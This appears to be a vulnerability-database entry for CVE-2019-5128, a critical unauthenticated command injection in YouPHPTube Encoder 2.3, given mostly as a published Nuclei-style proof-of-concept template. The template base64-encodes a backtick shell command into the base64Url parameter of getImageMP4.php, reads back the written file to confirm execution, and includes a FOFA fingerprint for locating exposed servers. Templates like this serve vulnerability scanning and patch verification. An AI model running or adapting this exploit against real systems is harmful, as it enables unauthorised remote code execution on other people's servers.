漏洞描述
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
CVE-2019-5128: YouPHPTube Encoder - Arbitrary File Write
PoC代码[已公开]
id: CVE-2019-5128
info:
name: YouPHPTube Encoder - Arbitrary File Write
author: pussycat0x
severity: critical
description: |
Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
reference:
- https://xz.aliyun.com/news/6312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-5128
cwe-id: CWE-78
epss-score: 0.92845
epss-percentile: 0.99753
cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
metadata:
verified: true
vendor: youphptube
product: youphptube_encoder
fofa-query: icon_hash="-276846707"
tags: cve,cve2019,youphptube,intrusive,encoder,vkev,vuln
variables:
file_name: "{{rand_text_alpha(4)}}.txt"
content: "id"
payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'
http:
- raw:
- |
GET /objects/getImageMP4.php?base64Url={{payload}}&format=jpg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /objects/{{file_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 490a00463044022065d8ccaf5f394a46486d229c12dfd024a4e97e3570fc62d530a0566878f11cb902204f24349735d1de8be7157cb53e22fda8b937f18e97754bb7581a21a97f715514:922c64590222798bb761d5b6d8e72950